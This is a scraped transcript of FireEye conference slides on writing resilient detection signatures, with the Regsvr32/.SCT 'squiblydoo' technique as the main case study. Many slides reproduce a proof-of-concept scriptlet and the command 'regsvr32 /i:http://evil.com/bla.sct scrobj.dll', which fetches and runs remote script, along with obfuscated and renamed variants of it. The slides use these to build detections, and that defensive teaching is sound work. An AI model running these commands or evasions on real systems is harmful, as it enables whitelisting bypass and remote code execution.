Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 

SignaturesAreDead Long Live RESILIENT Signatures

  • 1. $SignaturesAreDead = "Long Live RESILIENT Signatures" wide ascii nocase Daniel Bohannon @danielhbohannon Senior Applied Security Researcher Matthew Dunwoody @matthewdunwoody Senior Security Architect
  • 2. ©2018 FireEye | Private & Confidential whoami 2 s/ami/arewe Daniel Bohannon @danielhbohannon Beard, Coffee & all things Obfuscation Matthew Dunwoody @matthewdunwoody Person
  • 3. ©2018 FireEye | Private & Confidential Experience @ Scale Hundreds of client & customer environments 10+ million endpoints Hundreds of network sensors Millions of malware samples 3 http://pluspng.com/img-png/png-hd-scale-trb-rating-scales-the-review-board-scales-of-justice-png-5600.jpg How we operate to find evil
  • 6. ©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 6 https://kotaku.com/no-jackie-chan-is-not-dead-1762840753 Signature Trigger Rule IOC (Indicator of Compromise) Hunting What do you mean by "words"?
  • 7. ©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 7 https://kotaku.com/no-jackie-chan-is-not-dead-1762840753 A/V Signature Real-time Trigger IDS/SIEM/Snort/etc. Rule Historical IOC (Indicator of Compromise) Threat Hunting What do you mean by "words"?
  • 8. ©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 8 What do you mean by "words"?
  • 9. ©2018 FireEye | Private & Confidential <script language="DFIR-Speak"> 9 What do you mean by "words"? Detection –Historical & real-time –Host- & network-based –Language/tool agnostic
  • 10. ©2018 FireEye | Private & Confidential 10 File hashes? File names? IPs/domains? Twitter handles in source code? Signatures & Indicators What are they? What are they not? https://betanews.com/2016/07/28/how-to-print-to-pdf-directly-in-windows-10-no-software-required/
  • 11. ©2018 FireEye | Private & Confidential Spot a Bad Signature 11 "You can hunt with THIS, or you can hunt with THAT…"
  • 12. ©2018 FireEye | Private & Confidential (Don't) Learn from (Bad) Signatures 12 https://follows.com/blog/wp-content/uploads/2018/02/Meme-You-Made-This.jpg This is an IOC This is an IOC That is an IOC? Garbage in, garbage out Threat Feed
  • 13. ©2018 FireEye | Private & Confidential What is a Good Signature? 13 https://www.reddit.com/r/gifs/comments/3e08b7/i_made_this_oc/ And WHO gets to decide? Who DEFINES good signatures? –Vendors? –Salespeople? –Threat feed? –Practitioners? Good signatures are…
  • 14. ©2018 FireEye | Private & Confidential Good Signatures 14 are… More resilient than rigid – Resist evasions and normal changes to TTPs More methodology-based than specific – Capture method or technique rather than specific procedure More proactive than reactive – Identify new methodologies and anticipated evasions
  • 16. ©2018 FireEye | Private & Confidential Process 16 Overview  Define detection  Assemble a sample set  Test existing detections  Generate data  Write detection  Test and tune http://www.radicalradiationremedy.com/wp- content/uploads/2017/03/4419a4e7c09d3abf08c4f723be2567d2_-coming-soon-think- process-process_800-600.png
  • 17. ©2018 FireEye | Private & Confidential Process 17 Define detection What to find – NewHotness malware, squiblydoo, DNS C2  When to find it – Real time, historical  Where to find it – Endpoints, network, SIEM, sandbox (Who and why should be defined based on historical incidents, threat profile and operational priority. Please consult a qualified intel analyst for more details.) https://www.insightsintoimpact.com/wp- content/uploads/2018/05/process-who-what-why-where.jpg
  • 18. ©2018 FireEye | Private & Confidential Process 18 Define detection How to find it –What tools are applicable and available –What signature formats are supported and best-suited  Snort/Suricata  SIEM query  Yara  Yara + modules  OpenIOC  Stix  ClamAV  Sandbox signature –False positive tolerance
  • 19. ©2018 FireEye | Private & Confidential Process 19 Assemble a Sample Set  Samples representing the thing  Collected – Every available example – All variants and versions  Generated (if applicable) – Run builders, compilers, obfuscators – Develop new variants based on methodology  Try to enumerate the entire problem set – Don’t stop at the most common examples https://www.zedge.net/wallpaper/e532419 c-4a75-4d6c-869b-eb422735dcd9 Set Bonus
  • 20. ©2018 FireEye | Private & Confidential Process 20 Test Existing Detections  Test existing detection capabilities for any free wins – Test safely, ideally outside of prod – Inform stakeholders  Adjust priority of applicable existing detections – Generic.PwShell.RefA.1B61FA61 == invoke-mimikatz – Gen:Variant.Ursu.120152 == ChopStick  Fill gaps in existing capabilities  Extend detection to other media / engines
  • 21. ©2018 FireEye | Private & Confidential Process 21 Generate Data  Generate data – Logs – PCAP – Binary metadata – Strings  This may not be necessary for plain text http://www.startrek.com/uploads/assets/db_articles/26da32597d9bd37fde9d a22660aa524f24fd725c.jpg
  • 22. ©2018 FireEye | Private & Confidential Process 22 Write detection  Start broad and tune down  Many detections can be translated between type  Be mindful of, and challenge, assumptions  Actively try to bypass methodology-based detections  May need specific rules to capture specific cases https://www.timeshighereducation.com/sites/default/files/styles/the_breaking_news_ image_style/public/person-writing-letter-with-metal-quill.jpg?itok=lCt7Bo6c
  • 23. ©2018 FireEye | Private & Confidential Process 23 Test  FN testing against sample set – Gotta catch em all  FP testing against legit data – Start small, tune to FP target, increase scale, iterate – Re-test against samples to validate tuning – If compromise to hit FP target, document what is missed  Test against new TPs that are identified during testing or deployment – Do all of the detections catch it? https://blog.essaytigers.com/wp- content/uploads/failed-exam-491x350.jpg
  • 25. ©2018 FireEye | Private & Confidential Binaries 25 Background Attackers still use malicious binaries Malware changes frequently – Polymorphic – Builders – Version updates Can’t always rely on AV – AV sigs lag – Easy to test against, easy to bypass – Can’t always submit malware to vendors ML is great but it depends on the model and implementation - doesn’t detect everything Validate the effectiveness of existing detection Intelligence gathering, eg. VT retrohunt
  • 26. ©2018 FireEye | Private & Confidential Binaries 26 Background Existing detection/protection ineffective AND: – Active intrusion – High-priority threat – Prolific or publicly-available malware Need additional context beyond “it’s bad” Intel gathering, tagging, etc. https://medium.com/@dunstconsulting/the-different-types-of-malware-analysis-c9bfbaa44739
  • 27. ©2018 FireEye | Private & Confidential Binaries 27 Define Detection Example: –What: All Chopstick malware variants –Where: Endpoint, network, sandbox –When: Historical and real-time –How: Yara + modules, OpenIOC, Snort, SIEM, EDR –False positive tolerance: Moderate http://4.bp.blogspot.com/- FzMgc7Y015s/U9VZdexxSJI/AAAAAAAAAJ4/9QOwiRu- K6g/s1600/diningtips04.jpg
  • 28. ©2018 FireEye | Private & Confidential Binaries 28 Assemble a Sample Set For attacker malware, collect as many samples as possible, from as many variants as possible – Collect hashes from high-confidence sources  Threat intel feeds  Public malware repos  Malware analysis reports –VirusTotal Intelligence – Implant builders  Blogs https://attack.mitre.org/wiki/Software/S0023
  • 29. ©2018 FireEye | Private & Confidential Binaries 29 Assemble a Sample Set For public malware, generate representative samples – Use multiple versions, if updates are available – Generate variants for all of the significant options in a builder  Focus on options that impact the structure, behavior or network comms of the malware – Use common packers and obfuscators  UPX  ConfuserEx (.Net) https://funnyjunk.com/funny_pictures/3434944/Awesome+starwars/167
  • 30. ©2018 FireEye | Private & Confidential Binaries 30 Test Existing Detections  Test – Scan with static engines (AV / ML) – Run on isolated test system for real-time / dynamic – Replay PCAP through IDS – Run in sandbox  What alerts are generated?  What data is produced?  Stop here or continue? http://www.educationviews.org/wp-content/uploads/2017/03/petri-dish-used-for_f5f2b18d-d028- 4921-9ad0-938bb9d3720b.jpg
  • 31. ©2018 FireEye | Private & Confidential Binaries 31 Generate data Collect dynamic execution details – Sandbox reports – Online sandboxes, vendor sandboxes, Cuckoo – Malware reports and blogs – Manual dynamic analysis – Process memory / strings – PCAP capture Parse binaries using tools – PEExplorer, CFF Explorer, others – SigCheck – FLOSS / Strings – Vendor analysis engine
  • 32. ©2018 FireEye | Private & Confidential Binaries 32 Write Detection  Group samples based on data – Windows vs. OSX vs. *nix – EXE vs. DLL version – Different import hashes Look for outliers that may not belong Look for commonalities across remaining samples Divide further when commonalities break down https://www.computerhope.com/jargon/s/sort.htm
  • 33. ©2018 FireEye | Private & Confidential Binaries 33 Write Detection Look for common elements within each group and across groups Dynamic execution items – Persistence – Mutex – Named pipe – C2 – Handle to config file/reg – String decoded in memory – Injection into a known process Resources Export name Size range Export timestamp PE timestamp Import hash PE characteristics Strings Hex strings Authenticode signature Imports/exports Sections/non- section data Version info
  • 34. ©2018 FireEye | Private & Confidential Binaries 34 Write Detection Look for common elements within each group and across groups Dynamic execution items – Persistence – Mutex – Named pipe – C2 – Handle to config file/reg – String decoded in memory – Injection into a known process Resources Export name Size range Export timestamp PE timestamp Import hash PE characteristics Strings Hex strings Authenticode signature Imports/exports Sections/non- section data Version info  Literally anything else available tools support
  • 35. ©2018 FireEye | Private & Confidential Binaries 35 Write Detection Use common elements as starting point – If it detects all known versions, based on common elements, increases the chance of catching future versions Use behavior-based detections where possible Incorporate both structure of malware and attacker TTPs in deploying/using it Add in weaker detections (hashes, domains, etc.) Make signatures as broad as possible, and detect in as many ways as possible, with acceptable FP rate
  • 36. ©2018 FireEye | Private & Confidential Binaries 36 Test Run it! – Against sample set – Against clean systems – Against corpus of malware & binaries  VT retrohunt, WSUS, etc. – Test environment (if available) – Production test Review hits, update (for TPs & FPs) and iterate Keep the rule as broad as possible while maintaining FP rate https://img.memecdn.com/run-fail_o_2718843.webp
  • 38. ©2018 FireEye | Private & Confidential Regsvr32.exe + .SCT 39 Found by Casey Smith (@subTee) in 2016 App whitelisting bypass Regsrv32.exe to execute local or remote .SCT file scripting contents What's this SquiblyDoo you speak of? Detection opportunities: –Regsvr32.exe execution  Arguments  .DLL loads  Network connection –.SCT file contents  Network & Host
  • 39. ©2018 FireEye | Private & Confidential Regsvr32.exe + .SCT 40 The original POC <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct Command regsvr32.exe /s /n /u /i:http://evil.com/bla.sct scrobj.dll
  • 40. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 41 #KnowYourOptions Command  regsvr32.exe  /s /n /u /i:http://  .sct  scrobj.dll regsvr32.exe /s /n /u /i:http://evil.com/bla.sct scrobj.dll
  • 41. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 42 #KnowYourOptions Command  regsvr32.exe  /s /n /u /i:http://  .sct  scrobj.dll regsvr32.exe /s /n /u /i:http:evil.com/bla.sct scrobj.dll
  • 42. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 43 #KnowYourOptions regsvr32.exe /s /n /u /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s /n /u /i:http:  .sct  scrobj.dll
  • 43. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 44 #KnowYourOptions regsvr32.exe /s /n /u /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s /n /u /i:http  .sct  scrobj.dll  /i:http:  /i:https  /i:ftp:  /i:remotec$  /i:C:Tempbla.sct  /i:bla.sct
  • 44. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 45 #KnowYourOptions regsvr32.exe /s /n /u /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s /n /u /i:http  .sct  scrobj.dll
  • 45. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 46 #KnowYourOptions regsvr32.exe /u /n /s /i:https:evil.com/bla.sct scrobj.dll Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll
  • 46. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 47 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct /n scrobj.dll /s Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll
  • 47. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 48 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct /n scrobj.dll /s Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll /n – Do not call DllRegisterServer or DllUnregisterServer; this option must be used with /i.
  • 48. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 49 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct scrobj.dll /s Command  regsvr32.exe  /s .  /n .  /u .  /i:http  .sct  scrobj.dll /n – Do not call DllRegisterServer or DllUnregisterServer; this option must be used with /i.  FALSE! Not required 
  • 49. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 50 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct scrobj.dll /s Command  regsvr32.exe  /s .  /u .  /i:http  .sct  scrobj.dll /n – Do not call DllRegisterServer or DllUnregisterServer; this option must be used with /i.  FALSE! Not required 
  • 50. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 51 #KnowYourOptions regsvr32.exe /u /i:https:evil.com/bla.sct scrobj.dll /s Command  regsvr32.exe  /s .  /u .  /i:http  .sct  scrobj.dll
  • 51. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 52 #KnowYourOptions regsvr32.exe -u -i:https:evil.com/bla.sct scrobj.dll -s Command  regsvr32.exe  /s or -s.  /u or -u .  /i:http or -i:http  .sct  scrobj.dll
  • 52. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 53 #KnowYourOptions regsvr32.exe -u -i:https:evil.com/bla.sct scrobj.dll -s Command  regsvr32.exe  /s or -s.  /u or -u .  /i:http or -i:http  .sct  scrobj.dll
  • 53. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 54 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32.exe  /s or -s.  /u or -u .  /i:http or -i:http  .sct  scrobj.dll
  • 54. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 55 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj
  • 55. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 56 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj
  • 56. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 57 #KnowYourOptions regsvr32 -u -i:https:evil.com/bla scrobj -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj C:> copy regsvr32.exe casey.exe C:> copy scrobj.dll smith.dll Renaming
  • 57. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 58 #KnowYourOptions casey -u -i:https:evil.com/bla smith -s Command  regsvr32  /s or -s.  /u or -u .  /i:http or -i:http  scrobj C:> copy regsvr32.exe casey.exe C:> copy scrobj.dll smith.dll Renaming
  • 58. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 59 #KnowYourOptions casey -u -i:https:evil.com/bla smith -s Command  /s or -s.  /u or -u .  /i:http or -i:http
  • 59. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 60 #KnowYourOptions casey -u -i:https:evil.com/bla smith -s Command  /s or -s .  /u or -u .  /i:http or -i:http
  • 60. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 61 #KnowYourOptions casey -ugh... -i:https:evil.com/bla smith -s Command  /s or -s .  /u or -u .  /i:http or -i:http
  • 61. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 62 #KnowYourOptions casey -ugh... -i:https:evil.com/bla smith -stop-it! Command  /s or -s .  /u or -u .  /i:http or -i:http
  • 62. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 63 #KnowYourOptions casey -ugh... -i:https:evil.com/bla smith -stop-it! Command  /s or -s  /u or -u  /i:http or -i:http
  • 63. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 64 #KnowYourOptions casey "-"ugh... -i:https:evil.com/bla smith -""stop-it! Command  /s or -s  /u or -u  /i:http or -i:http
  • 64. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 65 #KnowYourOptions casey "-"ugh... -"i":ht""tps:evil.com/bla smith -""stop-it! Command  /s or -s  /u or -u  /i:http or -i:http https://imgur.com/gallery/Vs7D1QO
  • 65. ©2018 FireEye | Private & Confidential Detecting Regsvr32.exe Arguments 66 Different approaches pay off… Command http://knowyourmeme.com/memes/happy-cat I CAN HAS MAGIC REGEX? Arguments w/o obfuscation Handle obfuscation separately Handle renamed .exe/.dll separately Regsvr32.exe network connections Regsvr32.exe image load events –Jscript.dll, jscript9.dll, vbscript.dll Regsvr32.exe args over the network
  • 67. ©2018 FireEye | Private & Confidential Detecting .SCT Content 68 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct Command regsvr32.exe /s /n /u /i:http://evil.com/bla.sct scrobj.dll
  • 68. ©2018 FireEye | Private & Confidential Detecting .SCT Content 69 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker
  • 69. ©2018 FireEye | Private & Confidential Detecting .SCT Content 70 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker
  • 70. ©2018 FireEye | Private & Confidential Detecting .SCT Content 71 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required?
  • 71. ©2018 FireEye | Private & Confidential Detecting .SCT Content 72 YARA fans & network analysts awaken… <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required?
  • 72. ©2018 FireEye | Private & Confidential Detecting .SCT Content 73 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <script language="JScript"> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required?
  • 73. ©2018 FireEye | Private & Confidential Detecting .SCT Content 74 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <script language="JScript"> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
  • 74. ©2018 FireEye | Private & Confidential Detecting .SCT Content 75 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}"> <script language="JScript"> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
  • 75. ©2018 FireEye | Private & Confidential Detecting .SCT Content 76 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{F0001111-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
  • 76. ©2018 FireEye | Private & Confidential Detecting .SCT Content 77 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{F0001111-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
  • 77. ©2018 FireEye | Private & Confidential Detecting .SCT Content 78 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB01111-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
  • 78. ©2018 FireEye | Private & Confidential Detecting .SCT Content 79 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-0000-0000-0000-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
  • 79. ©2018 FireEye | Private & Confidential Detecting .SCT Content 80 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-0000FEEDACDC}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
  • 80. ©2018 FireEye | Private & Confidential Detecting .SCT Content 81 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? https://commons.wikimedia.org/wiki/File:Acdc_logo_band.svg
  • 81. ©2018 FireEye | Private & Confidential Detecting .SCT Content 82 YARA fans & network analysts awaken… <?XML?> <scriptlet> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </scriptlet> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
  • 82. ©2018 FireEye | Private & Confidential Detecting .SCT Content 83 YARA fans & network analysts awaken… <?XML?> <component> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </component> bla.sct What's common? (there by default) #lazyhacker What's required? What can change?
  • 83. ©2018 FireEye | Private & Confidential Detecting .SCT Content 84 YARA fans & network analysts awaken… <?XML?> <component> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script language='JScript'> var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </component> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? JScript VBScript JScript.Encode VBScript.Encode #@~^NAAAAA==O•/O,',ZD•lDnr(LnmD`E UmDb2Yc?t•ssJ*R"EU`E^mV^ R•a+r#ahEAAA==^#~@
  • 84. ©2018 FireEye | Private & Confidential Detecting .SCT Content 85 YARA fans & network analysts awaken… <?XML?> <component> <registration classid='{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}'> <script > var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script> </registration> </component> bla.sct What's common? (there by default) #lazyhacker What's required? What can change? JScript VBScript JScript.Encode VBScript.Encode #@~^NAAAAA==O•/O,',ZD•lDnr(LnmD`E UmDb2Yc?t•ssJ*R"EU`E^mV^ R•a+r#ahEAAA==^#~@
  • 85. ©2018 FireEye | Private & Confidential Detecting .SCT Content 86 YARA fans & network analysts awaken… <?XML ?> <component > <registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' > <script > var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script > </registration > </component > bla.sct What's common? (there by default) #lazyhacker What's required? What can change? What can be added?
  • 86. ©2018 FireEye | Private & Confidential Detecting .SCT Content 87 YARA fans & network analysts awaken… <?XML ?> <component > <registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' > <script > var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); </script > </registration > </component > bla.sct What's common? (there by default) #lazyhacker What's required? What can change? What can be added? var r = new ActiveXObject ( "WScript.Shell" ) . Run ( "calc.exe" ) ;
  • 87. ©2018 FireEye | Private & Confidential Detecting .SCT Content 88 YARA fans & network analysts awaken… <?XML ?><component ><registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' ><script >var r = new ActiveXObject ( "WScript.Shell" ) . Run ( "calc.exe" ) ; </script ></registration ></component > bla.sct What's common? (there by default) #lazyhacker What's required? What can change? What can be added?
  • 88. ©2018 FireEye | Private & Confidential Detecting .SCT Content 89 Different approaches pay off… <?XML ?><component ><registration classid = '{FDB0FDB0-FDB0-FDB0-FDB0-EFFFFFFFFDB0}' ><script >var r = new ActiveXObject ( "WScript.Shell" ) . Run ( "calc.exe" ) ; </script ></registration ></component > bla.sct Network detections: –Download over HTTP –Transfer over SMB Host detections: –Downloaded .SCT file (extension doesn’t matter) in  Temporary Internet Files  INetCache
  • 89. ©2018 FireEye | Private & Confidential Detecting .SCT Content 90 Different approaches pay off… Command http://knowyourmeme.com/memes/happy-cat I CAN HAS MAGIC REGEX? Script w/o obfuscation Handle obfuscation separately Focus on default strings (lazy attacker) Focus on anchors (“<registration”) with ABSENCE of default strings Detections against scripting content payload regardless of .SCT wrapper –DotNetToJScript
  • 91. ©2018 FireEye | Private & Confidential Proactive Detection 92 Hunting Form a hypothesis of a way to find evil and test – Gather data and conduct analysis Find evil vs. define detection for evil Synergy! –Hunt to validate detection –Develop detection based on hunt result https://www.usatoday.com/story/news/2018/08/28/grizzly- hunt-pits-tourists-against-sportsmen-wyoming/1065854002/
  • 92. ©2018 FireEye | Private & Confidential Proactive Detection 93 Hunting One output of a hunt should be new detections – Blacklist evil or whitelist good Detections that do not meet the target FP tolerance should become hunts If you’re hunting for the same things over and over, consider automating that process into a detection https://press-start.com.au/news/pcmac/2017/03/09/duck-hunt-inspired-game-coming-vr/ I may have had the Duck Hunt high score the last time I was at BruCon
  • 93. ©2018 FireEye | Private & Confidential Proactive Detection 94 Detect across the attack lifecycle Initial Compromise Establish Foothold Escalate Privileges Internal Recon Complete Mission Move Laterally Maintain Presence • Backdoor variants • VPN subversion • Sleeper malware • Net use commands • Reverse shell access • Social engineering • External compromise • Custom malware • C2 • App exploitation • Credential theft • Password cracking • “Pass-the-hash” • Critical system recon • System, Active Directory, and user enumeration • Staging servers • Data consolidation • Data theft
  • 94. ©2018 FireEye | Private & Confidential Proactive Detection 95 Where else do our detection ideas come from? Active and historic attacker activity in hundreds of Incident Response engagements and managed service customers Analyzing malware samples from engagements and malware repositories (internal/external) Intel (the good kind) Open source research - Twitter, Github, vendor blog posts, etc. (Github history is an invaluable resource) Crazy whims – IWHO (“I Wonder How Often…”)
  • 96. ©2018 FireEye | Private & Confidential Takeaways 97 I’ll take mine to go Know what you are detecting today and HOW you are detecting it – What data sources? – What toolsets? – What timeframes (lag time to actionable alert/data)? Know your assumptions about attacker techniques and your own visibility Capture result of hunts as new detections
  • 97. ©2018 FireEye | Private & Confidential Takeaways 98 Second helping Know your tools – Validate data sources with more than one tool – Understand limitations of toolsets and/or artifacts and compensate elsewhere (build your own, open source tooling, etc.) Automate repetitive tasks to free you up to more effectively develop methodology-based detections – Initial idea and detection development – Tuning/scrapping/rebuilding of detection – Monitoring and tuning going forward for detection